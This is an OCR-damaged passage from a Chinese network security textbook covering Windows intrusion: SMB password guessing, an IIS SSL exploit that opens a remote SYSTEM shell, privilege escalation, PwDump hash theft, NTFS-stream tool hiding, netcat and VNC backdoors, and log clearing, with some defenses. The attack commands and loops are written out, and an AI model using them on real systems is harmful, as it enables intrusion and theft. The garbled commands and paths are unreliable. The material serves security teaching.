SMTP,POPS3 fil NNTP 等 协议 及 其 服务 几乎 都 可 以 在 TIS 中 实现 。 


1. 远程 口令 猜测 


黑客 攻击 Windows 系统 的 方法 是 攻击 文件 和 打印 共享 服务 所 运行 的 SMB 协议 。 
SMB 在 Windows 2000 及 以 后 的 版 本 中 ,除了 使 用 139 号 端口 外 ,还 使 用 445 端口 ,实现 直 
连 主机 的 服务 ,其 实质 是 SMB over HTTP 服务 。 当 攻击 者 试 着 连接 一 个 在 查 点 阶段 发 现 
的 共享 卷 ,如 进程 间 通 信 共 享 卷 (IPC $ ) 或 系统 管理 共享 卷 (C$ ) 时 ,其 一 定 先 尝试 各 种 用 
户 名 /口令 组 合 ,直到 能 进入 目标 系统 为 止 。 

口令 猜测 可 以 使 用 下 列 命令 行 ,其 中 (* ) 表 示 装 入 口令 的 地 方 : 

C: V» net use \\192. 168.202.44\IPCS « /u:Adninistrator 


Type the password for \\192. 168. 202. 44\ IPC $ : 


The command completed successfully. 


在 本 例 中 ,如 果 由 */u” 给 出 的 Administrator 账户 名 去 连接 目标 系统 而 不 成 功 ,可 以 利 
用 “DOMAIN\Naccount” 或 “MACHINE\account” 去 连接 。 它 们 各 自 的 安全 标识 符 (SID) 是 
不 同 的 。 

攻击 者 可 以 只 猜测 某 服务 器 或 工作 站 上 的 “本 地 ”已 知 账户 的 口令 ,而 不 用 猜测 
Windows 域 控制 器 上 的 全 局 账户 的 口令 ,该 口令 可 能 更 严格 些 。 口 令 猜 测 是 有 次 数 限制 
的 ,超过 账户 锁定 阅 值 时 ,账户 将 被 锁定 。 为 此 ,利用 工具 进行 自动 化 猜测 是 有 必要 的 。 

事实 上 ,许多 专用 的 软件 程序 可 以 进行 自动 化 的 口令 猜测 。 例 如 ,legion 工具 可 以 一 次 
扫描 多 个 C 类 IP 地 址 范围 ,以 便 找 出 共享 卷 ,同时 提供 手动 方式 的 字典 攻击 工具 。 此 外 ， 
NetBIOS Auditing Tool(NAT) 和 WindowsInfoScan 都 是 免费 的 命令 行 工具 ,也 能 帮助 攻 
击 者 进行 快速 的 口令 猜测 。 当 然 , 如 果 一 时 找 不 到 工具 ,也 可 以 在 Windows 的 命令 行 窗口 
中 用 FOR 命令 和 标准 的 net use 语 法 编写 一 个 简单 的 循环 ,然后 进行 自动 化 口令 猜测 。 

首先 ,创建 一 个 简单 的 用 户 名 (如 Administrator) 和 口令 文件 cred. txt, 如 下 所 示 : 


[File: cred. txt] 


password username 
Adninistrator 
password Administrator 
administrator Administrator 
admin Administrator 


secret Administrator 
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注意 ,上 述 文件 使 用 制 表 符 作为 分 隔 符 ,”" 为 空 口令 ,其 他 口令 是 常见 的 口令 。 
紧 接着 ,利用 FOR 命令 将 文件 输入 : 


C:\> FOR /F "token =1,2*" % i in(cred. txt) do net use \\target\IPC$ & i /u: $j 


上 述 命令 将 把 cred. txt 文件 中 第 一 行 的 第 一 个 记号 赋值 给 变量 %i( 口 令 ), 第 二 个 赋值 
给 变量 %j( 用 户 名 ) 。net use 命令 将 使 用 这 两 个 变量 作为 参数 去 尝试 连接 目标 系统 的 服务 
器 共享 卷 。 在 命令 提示 符 处 输入 "FOR /?” 可 以 查看 FOR 命令 的 帮助 信息 。 

为 了 防范 口令 猜测 的 攻击 ,首先 应 当 利用 防火 墙 安防 手段 ,禁止 或 限制 TCP 139 和 
TCP 445 号 端口 上 的 SMB 服务 。 其 次 ,可 以 使 用 Windows 的 主机 级 安防 机 制 来 限制 对 
SMB 的 访问 ,其 中 IPSec 过 滤器 只 适用 于 Windows 2000 及 以 上 版 本 , Internet Connection 
Firewall(ICF) 仅 适用 于 Windows XP, Windows Server 2003 及 以 上 版 本 。 


2. 针对 IIS 的 攻击 


针对 TIS 的 攻击 手段 几乎 都 以 TIS 提供 的 WWW 服务 (HTTP 守护 进程 ) 为 攻击 目标 ， 
它们 的 进攻 路 线 主要 有 三 条 : 信息 泄露 ,目录 遍历 和 缓冲 区 溢出 。 下 面 介绍 针对 TIS 的 最 新 
攻击 手段 。 

自从 1996 年 6 月 在 ISM. DLL 中 发 现 第 一 个 缓冲 区 溢出 漏洞 以 来 ,实现 索引 服务 的 
IDA. DLL 和 实现 因特网 打印 协议 的 msw3ptr. dll 等 TIS 功能 模块 中 不 断 发 现 IIS 的 缓冲 区 
溢出 漏洞 。 针 对 此 漏洞 ,微软 公司 在 TIS 6.0 中 禁用 这 些 功能 模块 。 但 是 ,为 电子 商务 提供 
保护 的 SSL 必须 开放 这 些 功能 。 因 此 ,微软 公司 2004 年 4 月 发 布 的 MS-04-011 安防 公告 
承认 ,为 提供 SSL 功能 的 某 个 函数 库 发 现 一 个 与 PCT(private communications transport) 
协议 相关 的 代码 中 存在 缓冲 区 溢出 漏洞 。 虽 然 PCT 已 过 时 , 却 给 黑客 留 下 了 攻击 的 立 
足 点 。 

例如 ,Johnny Cyberpunk 发 布 的 thciisslame. c 的 程序 ,在 经 过 编译 之 后 ,可 通过 443 号 
端口 攻击 运行 IIS 的 Windows 2000 SPA 系统 。 如 能 获得 成 功 ,该 程序 将 把 一 个 以 system 
权限 运行 的 远程 命令 shell 发 送 到 攻击 者 主机 上 的 指定 端口 ,如 下 所 示 : 

C:\tools > thcisslame 192.168.234.119 192.168. 234. 2 1337 

Thciisslame v0.2 - IIS 5. 0 SSL remote root exploit 

test on Windows 2000 Server german/English SP4 

by Johnny Cyberpunk( jcyberpunk(4 thc. org) 

[ * ]building buffer 

[ * ]connecting the target 


[ * ]exploit send 

[ * ]waiting for shell 

c: WindowsVsystem32 > whoani 

NT AUTHORITY\ SYSTEM 

针对 PCT 缓冲 区 溢出 漏洞 的 补丁 和 具体 操作 可 以 在 微软 网 站 找到 。 作 为 应 急 措施 ,在 
Windows Server 2003 中 的 SSL 函数 库存 在 的 缓冲 区 溢出 漏洞 ,可 以 在 注册 表 中 把 主键 
(REG-BINARY 类 型 ,如 果 没 有 该 键 ,可 以 自己 创建 ) 的 键 值 设置 为 “00000000”( 禁 用 ): 
LHKEY LOCAL MACHINE\System\CurrentControlSet\ Control V SecurityProviders V 
SCHANNEIAProtocolsVPCT 1. 0VServerV Enable], 


53: ”黑客 攻击 技术 


3.3.2 权限 提升 


攻击 者 利用 交互 登录 权限 在 打开 一 个 Windows 系统 后 , 便 会 对 终极 特权 账户 
Administrator 或 System 进行 攻击 。 权 限 提升 是 重要 的 一 环 , 黑 客 采用 网 络 工 具 利用 
Windows 漏洞 进行 攻击 ,提升 权限 。 

Netddemsg 工具 利用 网 络 动态 数据 交换 服务 的 漏洞 攻击 Windows 2003 ,并 把 权限 提升 
到 System 水 平 ; Debploit 工具 利用 Windows 会 话 管理 器 的 漏洞 进行 攻击 ; Xdebug 工具 利 
用 Windows 内 核 调试 功能 的 漏洞 实行 攻击 。 对 因特网 的 用 户 来 说 ,攻击 Windows 系统 最 
重要 的 权限 提升 和 进攻 路 线 是 Web 浏览 和 电子 邮件 处 理 。 

从 技术 角度 讲 ,获得 Administrator 权限 并 不 等 于 获得 Windows 主机 的 最 高 权限 。 
System IK P! , tH | “Local System” “NT AUTHORITY\SYSTEM” 账 户 ,其 权限 比 
Administrator 账户 还 要 高 。 不 过 ,有 了 Administrator 权限 ,就 可 以 利用 Windows 的 计划 
任务 服务 打开 一 个 命令 shell 去 获得 System 账户 的 权限 : C:\>at 16:33 /INTERACTIVE 
cmd. exe。 

另外 ,www. sysinternals. com 提供 的 psexec 工具 也 允许 远程 获得 和 使 用 System 账户 
的 权限 。 


3.3.3 JE 


获得 Administrator 权限 后 ,攻击 者 必须 得 到 账户 的 口令 。 在 Windows 系统 中 ,口令 以 
密 文 的 形式 存放 在 安全 账号 管理 器 (security accounts manager, SAM) t}, SAM 中 存 有 本 地 
系统 或 域 控制 器 所 控制 范围 内 的 用 户 名 及 其 口令 。 

在 Windows 2003 系统 和 以 后 的 域 控制 器 上 ,口令 密 文 都 存放 在 Active Directory( 即 
A windir/6 WindowsDS\ntds. dib) 中 。 在 默认 安装 的 情况 下 ,ntds. dit 文件 的 大 小 接近 于 
10MB, 且 采用 了 加 密 格 式 ,攻击 者 很 难 进行 离线 分 析 。 在 不 是 域 控制 器 的 系统 上 ,SAM X 
件 存放 在 文件 夹 c:\windowsNsystem32\config 中 ,通常 无 法 下 载 。SAM 备份 文件 存放 在 
文件 夹 c:\windows\repair 中 ,可 以 下 载 。 

攻击 者 破解 SAM 文件 ,按照 以 下 步 又 。 

(1) 用 另 一 种 操作 系统 (如 DOS 系统 的 NTFSDOS 工具 包 ) 启 动 目标 主机 ,把 存放 口令 
密 文 的 文件 复制 到 移动 硬盘 上 。 

(2) 复制 硬盘 修复 工具 包 所 创建 的 SAM 备份 文件 。Windows 的 SAM 备份 文件 存放 
在 文件 夹 c:\windowsNrepair 中 ,该 文件 被 SYSKEY 加 密 。 

(3) 窃听 Windows 系统 的 身份 验证 过 程 。 

CD 利用 PwDump 7 工具 提取 口令 密 文 。PwDump7 工具 可 以 绕 过 SYSKEY 机 制 , 它 
利用 "DLL 注射 "急速 把 自身 的 代码 加 载 到 另 一 个 高 优先 级 的 进程 空间 ; 然后 发 出 一 个 内 
部 API 调 用 去 访问 经 由 SYSKEY 加 密 的 口令 ,而 无 须 对 它们 进行 破解 。 被 加 载 的 高 优先 
级 进程 是 lsass. exe, 它 是 本 地 安全 管理 子 系统 (local security authority subsystem, 
LSASS) 。 当 PwDump7 的 代码 “注射 "到 LSASS 的 地 址 空间 和 用 户 上 下 文 时 , 便 能 自动 查 
出 LSASS 的 进程 ID。PwDump7 可 以 从 TCP 139 或 TCP 445 号 端口 远程 提取 口令 密 文 ， 


59 


MV 


60 


Au 


网 络 安全 技术 


但 无 法 攻击 本 地 系统 。 

(5) LOphtCrack 破解 口令 密 文 。SAM 存放 的 用 户口 令 是 经 过 加 密 的 ,其 加 密 算法 为 
IBM LAN Manager(LM) 开 发 的 一 种 散 列 算法 ,脆弱 的 LM 散 列 算法 已 被 逆向 破解 。 微 软 
公司 为 了 保持 与 非 Windows 平台 的 软件 兼容 , Windows 2000 及 以 上 的 版 本 也 保留 了 LM 
算法 ,因此 破解 SAM 文件 已 不 是 什么 难事 。 

LM 散 列 算法 的 致命 弱点 是 把 口令 分 成 两 部 分 ,前 7 个 字符 为 一 组 ,后 7 个 字符 为 男 一 
H. 这样 ,8 个 字符 的 密码 可 看 成 7 个 字符 的 密码 和 1 个 字符 的 密码 。LOphtCrack THA 
用 这 个 弱点 ,设计 成 同时 破解 一 个 密码 的 两 半 ,就 像 它们 是 独立 的 密码 一 样 。 

以 12 个 字符 的 密码 123456Qwerty 为 例 ,按照 LM 算法 加 密 时 ,首先 转换 成 大 写字 母 
123456QWERTY ,然后 填 上 空格 符 补 齐 , 使 其 成 为 长 度 为 14 个 字符 的 密码 。 在 加 密 之 前 ,14 
个 字符 可 分 为 123456Q 和 WERTY — 两 部 分 ,两 个 字符 串 被 分 别 加 密 , 加 密 结果 合并 起 来 就 
是 最 终 的 散 列 值 。123456Q 加 密 后 为 6BF11E04AFAB197F, WERTY _ _ 加密 后 为 
1E9FFDCC75575B15 , 连 在 一 起 的 散 列 值 为 6BF11E04AFAB197F1E9FFDCC75575B15 。 

这 两 半 密 码 任何 一 半 被 攻破 时 ,LOphtCrack 就 立即 显示 。 现 在 有 可 能 对 密码 进行 狂 
W: 出 现 *“WERTY” 模 式 ,暗示 密码 选 自 键盘 的 连续 键 构成 。 由 此 可 以 推断 出 各 种 可 能 性 : 
QWERTY-QWERTY、 POIUYTQWERTY, ASDFGHQWERTY, YTREWQQWERTY 以 及 
123456QWERTY 这 个 最 终 被 认定 的 密码 。 


3.3.4 ”掩盖 踪迹 


攻击 者 取得 Administrator 账号 权限 后 ,不 仅 要 尽快 窃取 目标 系统 的 信息 ,还 要 做 些 善 
后 工作 ,比如 安置 几 个 后 门 程序 ,藏匿 一 个 工具 箱 ,禁止 审计 ,清空 事件 日 志和 隐藏 文件 。 这 
些 善后 工作 可 以 销赃 匿 迹 ,确保 不 被 检测 出 来 ,保证 再 次 返回 时 可 安全 行事 ,或 者 将 该 机 作 
为 桥头 堡 ,以 备 对 其 他 系统 发 动 攻击 时 可 以 少 做 些 工作 。 


1. 关闭 审计 功能 


利用 资源 工具 箱 中 的 auditpol 审计 程序 关闭 /打开 (Disable/Enable) 审 计 功 能 易 如 反 
掌 。 因 此 ,攻击 者 经 常 是 行事 时 将 审计 关闭 ,离开 目标 系统 前 再 将 审计 打开 ,于 是 auditpol 
就 保持 不 变 。 


2. 清理 事件 日 志 


在 获得 管理 员 权限 的 过 程 中 ,攻击 者 利用 自己 主机 的 事件 查看 器 (Event Viewer) 删 除 
Windows 事件 日 志 (Event Log) 留 下 的 踪迹 ,但 同时 会 留 下 一 条 新 的 记录 ,说 明 事件 日 志 已 
被 和 人 侵 者 清空 。 这 样 ,可 能 引起 目标 系统 管理 员 的 警觉 。 如 果 改 用 手工 改动 日 志文 件 , 也 不 
能 确保 成 功 ,因为 Windows 系统 使 用 的 日 志 语法 比较 复杂 。 


3. 隐藏 文件 


在 目标 系统 上 保留 一 个 工具 箱 以 供 再 次 入 侵 时 使 用 ,这 就 是 入 侵 者 的 意愿 。 但 是 ,攻击 
者 隐藏 工具 也 不 能 采取 简单 地 改变 文件 属性 的 方法 ,因为 在 资源 管理 器 中 可 以 用 “显示 所 有 
文件 ”选项 显示 隐藏 的 文件 。 
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如 果 目 标 系统 使 用 NTFS 文件 系统 , 则 攻击 者 隐藏 文件 的 方法 就 大 不 一 样 。 由 于 
NTFS 允许 单个 文件 中 同时 存在 多 个 信息 * 流 ”, 该 文件 流 机 制 是 “一 种 无 须 重新 构建 文件 系 
统 就 能 给 文件 添加 必要 属性 或 信息 的 机 制 ", 不 属于 安全 漏洞 。 但 是 ,黑客 却 能 利用 NTFS 
的 分 流 (Streaming ) 特性 藏匿 “工具 箱 ” 文 件 。 例 如 ,把 netcat. exe 作为 信息 流 隐藏 在 
“winnt\system32\os2” 子 目录 中 的 某 个 文件 中 ,以 待 后 续 攻 击 中 能 使 用 它 。 

(1) 为 了 往 文件 中 添加 信息 流 ,可 利用 工具 包 中 的 CP 程序 ,在 目标 文件 名 前 使 用 冒号 
指定 流 即 可 。 例 如 ; c:\>cp nc. exe oso001. 009 nc. exe, 

(2) 上 述 命令 把 nc. exe 隐藏 在 oso001. 009 文件 的 “nc. exe” 流 中 。 反 之 , 如 果 提 取 
“nc. exe” 流 , 则 改写 为 : c:\ 之 cp 0s0001. 009; nc. exe nc. exe, 

G) 上 述 命 令 又 表示 反 分 流出 “nc. exe”。 选 择 oso001. 009 作为 “前 端 "文件 ,仅仅 因为 
它 相对 模糊 些 。 添 加 文件 后 ,宿主 文件 的 长 度 不 仅 没有 增加 ,甚至 有 时 还 不 改变 修改 日 期 ， 
如 此 的 隐藏 方法 确实 难于 发 现 。 清 除 文件 流 的 方法 是 : 先 把 宿主 文件 复制 到 一 个 FAT 分 
区 ,然后 再 复制 回 NTFS 分 区 。 藏 在 宿主 文件 的 文件 流 不 能 以 oso001. 009; nc. exe 方式 执 
行 , 但 可 以 利用 start 命令 执行 : Start oso001. 009:nc. exe, 

如 上 所 述 ,针对 NTFS 文 件 流 的 防范 措施 只 能 是 利用 FoundStone 公司 开发 的 Sfind f 
序 发 现 被 隐藏 于 NTFS 文件 流 中 的 宿主 文件 ,并 尽快 清除 文件 流 。 


3.3.5 创建 后 门 


由 于 Windows 系统 缺乏 远程 命令 执行 机 制 ,一 旦 攻击 者 获得 管理 员 权 限 , 入 侵 和 破坏 
的 大 门 就 打开 了 。 下 面 说 明 攻 击 者 的 攻击 意图 及 其 所 使 用 的 攻击 工具 。 


1. 命令 行 远程 控制 工具 


具有 “瑞士 军刀 "美誉 的 NetCat 工具 软件 ,可 以 被 配置 成 监听 某 个 特定 端口 并 在 有 远程 
系统 连接 到 该 端口 时 启动 一 个 可 执行 程序 。 如 果 触 发 NetCat 监听 程序 去 启动 Windows 命 
令 行 shell, 这 个 shell 就 会 弹 回 到 攻击 者 的 远程 系统 上 。 例 如 ,以 窃听 模式 启动 NetCat 的 
语法 如 下 所 示 : 


c:\>nc -L -d -e cmd. exe - p 8080 


其 中 ,“-L” 表 示 连 接 多 次 掉 线 时 仍然 坚持 监听 ;“-d” 表 示 NetCat 以 隐秘 方式 运行 , 没 
有 交互 式 控制 台 ;“-e” 表 示 指 定 执行 的 程序 (如 本 例 的 cmd. exe);“-p” 表 示 指 定 监听 端口 
(8080)。 上 面 这 条 命令 将 向 任何 一 个 连接 到 8080 端口 的 攻击 者 返回 一 个 远程 命令 shell, 
有 了 shell, 攻 击 者 就 可 以 为 所 欲 为 。 

此 外 ,Psexec 工具 ,通过 TCP 139 或 TCP 445 号 端口 访问 SMB 服务 ,也 是 一 个 不 错 的 
选择 。 以 下 列 出 一 条 典型 的 命令 案例 : c: NL psexec \\10. 1. 1. 1 -u Administrator -p 
password -s cmd. exe, 


通过 psexec 执行 各 种 命令 比 利 用 AT 命令 更 加 简便 。 


2. 图 形 化 远程 控制 工具 
在 Windows 2000 以 上 的 版 本 ,具有 远程 控制 机 制 的 组 件 TSCterminal services) ,可 以 
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控制 远程 主机 。 

另外 ,有 一 些 专业 的 第 三 方 图 形 化 远程 控制 工具 ,例如 ,AT&T 开 发 的 优秀 工具 软件 
VNC(virtual network computing) ,通过 一 条 连接 控制 远程 主机 。 有 具体 过 程 如 下 。 

(1) 把 VNC 的 可 执行 程序 和 有 关 文 件 , 如 WINVNC. EXE, VNCHooKS. DLL 和 
OMNITHREAD-RT. DLL 等 复制 到 “C:\windows\system32” 下 的 某 个 不 易 被 发 现 的 地 
方 。 值 得 注意 的 是 , 较 新 版 本 的 WINVNC 版 本 会 在 服务 器 启动 时 ,在 系统 托盘 增加 一 个 绿 
色 的 图 标 。 

(2) 复制 后 需要 设置 一 个 VNC 口令 ,以 便 在 服务 启动 后 接受 外 来 连接 前 的 图 形 对 话 
框 中 输入 该 口令 。 同 时 ,要 求 WINVNC 监听 外 来 连接 ,然后 将 这 些 设置 信息 用 regini. exe 
添加 到 远程 目标 系统 的 注册 表 中 ,如 下 所 示 : Ci VD» rehini — m \\210. 42. 224. 11 
winvnc. ini, 

HKEY USERV. DEFAULT\ Sof tware\ ORLV Wi nVNC3 


SocketConnect - REG DWORD 0x00000001 
Password = REG BINARY 0x00000008 0x57bf2d2e Ox9e6cb06e 


上 述 3 行为 WINVNC. INI 的 文件 , 它 取 材 于 一 个 本 地 安装 ,并 用 Windows RK 工具 包 
中 的 Regdmp 程序 导出 一 个 文本 文件 ,其 中 口令 为 二 进 制 值 ,对 应 于 “secret”。 

(3) WINVNC 安装 为 一 项 服务 并 启动 它 。 

以 下 是 远程 系统 上 的 一 个 命令 shell。 

C: Vo winvnc - install 

C: V» net start winvnc 


The VNC Server service is starting. 


The VNC Server service was started successfully. 


利用 启动 的 vncviewer 程序 并 连接 目标 系统 ,就 可 以 看 到 目标 IP 地 址 210. 42. 224. 11 
处 的 0 号 “display” 的 截面 图 。 随 后 ,远程 桌面 系统 便 有 可 能 出 现 。 


@.4 网 络 攻击 与 防御 


所 有 试图 破坏 网 络 系统 的 安全 性 的 行为 都 叫做 网 络 攻击 。 入 侵 是 成 功 的 攻击 。 网 络 攻 
击 的 方式 分 为 主动 攻击 和 被 动 攻击 ,在 1. 5 节 已 详细 介绍 。 网 络 攻击 的 目标 分 为 系统 性 攻 
击 和 数据 型 攻击 ,其 所 对 应 的 安全 性 也 涉及 系统 安全 和 数据 安全 两 个 方面 。 系 统 性 攻击 的 
村 点 是 : 攻击 发 生 在 网 络 层 , 破 坏 系统 的 可 用 性 ,使 系统 不 能 正常 工作 ; 但 是 ,可 能 留 下 明 
显 的 攻击 痕迹 ,用 户 会 发 现 系统 不 能 工作 。 数 据 型 攻击 主要 来 源 于 内 部 ,该 类 攻击 的 特点 
是 : 攻击 发 生 在 应 用 层 , 面 向 信息 ,主要 目的 是 自 改 和 窃取 信息 ,不 会 留 下 明显 的 痕迹 。 

从 攻击 和 安全 的 类 型 分 析 , 得 出 一 个 重要 结论 : 一 个 完整 的 网 络 安全 解决 方案 不 仅 能 
防止 系统 性 攻击 ,也 能 防止 数据 型 攻击 , 既 能 解决 系统 安全 ,又 能 解决 数据 安全 两 方面 的 
问题 。 

综 上 所 述 , 我 们 很 难 确定 攻击 和 入 侵 的 界线 ,很 难 区 分 远程 攻击 和 本 地 攻击 ,很 难 将 所 
有 攻击 手段 罗列 齐全 。 下 面 介绍 黑客 利用 安全 漏洞 实现 攻击 的 常见 手段 和 防御 措施 。 
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3.4.1 口令 攻击 与 防御 


口令 攻击 是 指 黑客 以 口令 为 攻击 目标 ,破解 合法 用 户 的 口令 ,或 避 开 口令 验证 过 程 , 然 
后 冒充 合法 用 户 潜入 目标 系统 ,夺取 目标 系统 控制 权 的 过 程 。 如 果 这 个 用 户 有 域 管理 员 或 
Root 用 户 权限 ,黑客 就 能 访问 到 用 户 能 访问 到 的 任何 资源 ,这 是 极其 危险 的 。 

进行 口令 攻击 的 前 提 是 必须 先 得 到 该 主机 上 的 某 个 合法 用 户 的 账号 。 获 得 普通 用 户 账 
号 的 方法 很 简单 ,利用 目标 主机 的 Finger 功能 查询 使 用 者 的 信息 ,或 从 电子 邮件 地 址 收集 
目标 主机 的 账号 ,因为 很 多 用 户 会 使 用 一 些 习惯 性 账号 ,造成 账号 的 泄露 。 


1. 口令 攻击 常用 手段 


口令 攻击 常用 的 手段 有 社会 工程 学 ,网 络 嗅 探 \ 口 令 破 解 等 。 

(1) 社会 工程 学 。 社 会 工程 学 (social engineering) ,通过 人 际 交 往 这 一 非 技 术 手 段 欺骗 
的 方法 来 获得 口令 。 例 如 “钓鱼 ”网 站 吸引 用 户 注册 ,粗心 者 往往 会 泄露 或 重复 使 用 自己 的 
用 户 名 和 口令 。 

(2) 网 络 嗅 探 。 网 络 嗅 探 就 是 监听 者 (如 Wireshark) 可 以 采用 中 途 截击 的 方法 获取 用 
户 的 账号 和 口令 ,这 类 方法 有 一 定 的 局 限 性 ,但 是 危害 性 极 大 。 当 前 ,很 多 协议 根本 就 没有 
采取 任何 加 密 或 身份 认证 技术 ,如 Telnet, FTP, HTTP,SMTP 等 传输 协议 ,用 户 账户 和 口 
令 信息 都 是 以 明文 格式 传输 的 ,此 时 若 攻击 者 利用 数据 包 截取 工具 可 以 很 轻松 收集 到 用 户 
的 账户 和 口令 。Wireshark 截取 到 FTP 服务 的 账号 administrator 和 口令 china, 如 图 3-10 
58 163,166 行 所 示 。 


nm Go Qutwre bpalyre Statistics Telephony Joels Internals fly 
Guava saxa Aeta F2 En Raan gmn E 


me PE 


m Sore Destination Protocol Length. afe ^ 


x Saisie IVE os. 110r 1V2. 168- IU PI 70 Kequest: USEK anonymous 
100 192.168.1.101 FTP 126 Response: 331 Anonymous access allowed, send identity (eg 
192.168.1.100 FTP 68 Request: PASS IEUSen$ 


192.168.1.101 FTP 87 Response: 530 User IEUser6 cannot log in. 


192.168.1.101. BL Response: 220 Microsoft FTP service 


163 127.176004 192.165.1.101 192.168.1.1 T 
164 127.176055 192.168.1.100 192.166.1.101 E Lc S password required 
166 127.429483 192.168.1.101 192.168.1.100 FTP 66 Request: PASS china 


or administrator. 


192.168.1.101 FTP 89 Response: 230 User NE logged in. 
192.168.1.100 FTP 68 Request: opts ULfS 
d 58: 1. 1 me LA Msponsns 300 'OPTS rufa 0n': command not understood 


E Frane 163: 7 bytes on i Wire (ITERS, me ap ed G9; Bie 
Ethernet II, Src: GemtekTe c9:c0:98 (00:26:82:c9:c0:98), Dst: IntelCor.85:1f:b7 (00:13:20:85:1f:b7) 
& Internet Protocol, Src: 192.168.1.101 (192.168.1.101), Dst: 192.168.1.100 (192.168.1.100) 
a Transmission Control Protocol, src Port: boinc-client (1043), ost Port: ftp (21), seq: 1, Ack: 28, Len: 20 
& File Transfer Protocol (FTP) 
B USER administrator" n 
Request command: USER 
Request arg: administrator 


o000 00 13 20 85 1f b7 00 26 82 c9 c0 98 08 0045 00 ... 
Rt i09 600704903 40/06 b6 32 cQ a8 01 65 cO a8 
0020 01 64 04 13 00 15 37 67 af e4 cf 9c có 28 50 18 
0o30 faeo ea c2 00 00 $59 45 Ei o EEE 
0.0 ENENINHETEINZEE 0 


图 3-10 截取 的 账号 和 口令 
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(3) 口令 破解 。 口 令 破解 可 以 分 为 在 线 破 解 和 离线 破解 两 种 方式 。 在 线 破 解 , 就 是 用 
程序 自动 生成 密码 组 合 ,自动 重复 尝试 登录 被 攻击 主机 或 系统 。 这 种 方法 可 以 用 设置 重复 
登录 次 数 限制 或 在 Internet 上 普遍 采用 的 登录 时 要 求 输入 验证 的 方法 加 以 防范 。 离 线 破解 
需要 先 访问 保存 密码 信息 的 文件 或 数据 库 , 再 获取 用 户 的 账户 名 (如 电子 邮件 @ 前 面 的 部 
分 ) ,利用 一 些 专门 软件 强行 破解 用 户口 令 , 这 种 方法 不 受 网 段 限制 ,但 攻击 时 要 有 足够 
耐心 。 

离线 破解 通常 有 字典 攻击 、 穷 举 攻击 和 组 合 攻击 三 种 方式 。 

O 字典 攻击 。 攻 击 者 对 所 有 英文 单词 进行 尝试 ,程序 将 按 序 取 出 一 个 又 一 个 单词 , 进 
行 一 次 又 一 次 尝试 ,直到 成 功 。 对 于 一 个 有 8 万 个 英文 单词 的 集合 来 说 ,入 侵 者 不 到 一 分 钟 
就 可 以 试 完 。 如 果 用 户 的 口令 不 太 长 或 是 用 单词 ,那么 很 快 就 会 被 破译 。 

O 穷 举 攻击 。 如 果 字 典 攻击 不 能 成 功 ,攻击 者 可 以 采取 穷 举 攻击 。 一 般 从 长 度 为 1 的 
口令 开始 , 按 长 度 递增 进行 尝试 攻击 。 由 于 人 们 偏爱 简单 易 记 的 口令 , 穷 举 攻击 的 成 功率 
高 。 如 果 每 千 分 之 一 秒 检查 一 个 口令 ,那么 86% 的 口令 可 以 在 一 周 内 破译 。 

O 组 合 攻 击 。 这 种 方法 结合 字典 攻击 和 穷 举 攻击 的 特点 , 先 字典 攻击 ,再 采用 海量 连 
续 测试 口令 的 方法 进行 穷 举 攻 击 。 

LC5(LOphtCrack) 是 一 个 Windows 2000 密码 审计 工具 ,能 根据 操作 系统 中 存储 的 加 
密 哈 希 计算 Windows 2000 密码 ,功能 强大 ,丰富 。 它 用 三 种 方式 破解 密码 词典 攻击 \ 穷 举 
攻击 和 组 合 攻击 。 

PwDump7 不 是 一 个 密码 破解 程序 , 它 能 从 SAM 数据 库 中 提取 密码 哈 希 (Hash) ,如 
图 3-11 所 示 , 而 LC5 不 能 提取 密码 哈 希 。Windows 2000 使 用 了 SYSkey 对 口令 进行 更 强 
的 加 密 ,LC5 要 在 Windows 2000 下 提取 密码 哈 希 (Hash) ,必须 使 用 PwDump7。 


命令 提示 符 [-elxl| 


|C: \pudunp>puwdu 


:31D6CFEBD16hE931B73C59D7EBCB8| 


t:581:NO PRSSWORDyeeooouneonneponeeentz31D6CPEBD16NE931B?3C59D7EBCB89CB: 
nt:1889:4hCD1C8ECD878D7F5378F85B88781718:9DCNE78C94831DECCNE37FC4BBE3 


ISUPPORT. 388945a0:1882:N0 PRSSWORDwxeoooeeeepooeeneoooooe: EB3932D69B3E1361592h9E29F| 
[FCHS90: :: 


lc: Npudunp? 


图 3-11 PwDump? 提取 目标 主机 密码 哈 希 
2. 口令 攻击 的 防范 


防范 口令 攻击 的 方法 很 简单 ,只 要 使 自己 的 口令 不 在 英语 字典 中 , 且 不 可 能 被 别人 猜 出 
就 可 以 了 。 一 个 好 的 口令 应 当 至 少 有 7 个 字符 长 ,不 用 个 人 信息 (如 生日 ,名 字 等 ) ,口令 中 
要 有 一 些 非 字母 (如 数字 、 标 点 符号 ,控制 字符 等 ) ,不 能 写 在 纸 上 或 计算 机 中 的 文件 中 。 选 
择 口令 的 一 个 好 方法 是 将 两 个 不 相关 的 词 用 一 个 数字 或 控制 字符 相连 ,并 截断 为 8 个 字符 ， 
例如 口令 可 以 是 me2. hk97。 

保持 口令 安全 的 要 点 如 下 : 不 要 将 口令 写 下 来 ; 不 要 将 密码 保存 在 计算 机 文件 中 ; 不 
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要 选取 显而易见 的 信息 作 密码 ; 不 要 让 别人 知道 ; 不 要 在 不 同系 统 上 使 用 同一 口令 ; 定期 
改变 口令 ,至 少 6 个 月 要 改变 一 次 。 
* ”应 用 案例 


1. Windows 2000 口令 破解 程序 


下 面 介 绍 Windows 2000 口令 破解 程序 。 

(1) LOphtCrack 是 一 个 Windows 2000 密码 审计 工具 ,能 根据 操作 系统 中 存储 的 加 密 
哈 希 计算 Windows 2000 密码 ,功能 非常 强大 、 丰 富 , 是 目前 市 场 上 最 好 的 Windows 2000 8 
码 破 解 程序 之 一 。 它 有 三 种 方式 可 以 破解 密码 : 词典 攻击 .组 合 攻击 、 强 行 攻击 。 
LOphtCrack 有 一 个 美观 .容易 使 用 的 GUI, 而 且 利用 了 Windows 2000 的 两 个 实际 缺陷 ,这 
使 得 LOphtCrack 速度 奇 快 。 

(2) NTSweep 使 用 的 方法 和 其 他 口令 破解 程序 不 同 。 它 不 是 下 载 口令 并 离线 破解 ， 
NTSweep 是 利用 了 Microsoft 允许 用 户 改变 口令 的 机 制 。NTSweep 首先 取 定 一 个 单词 ， 
NTSweep 使 用 这 个 单词 作为 账号 的 原始 口令 并 试图 把 用 户 的 口令 改 为 同一 个 单词 。 如 果 
主 域 控制 机 器 返回 失败 信息 ,就 可 知道 这 不 是 原来 的 口令 。 反 之 如 果 返 回 成 功 信息 ,就 说 明 
这 一 定 是 账号 的 口令 。 因 为 成 功 地 把 口令 改 成 原来 的 值 ,用 户 永 远 不 会 知道 口令 曾经 被 人 
修改 过 。 

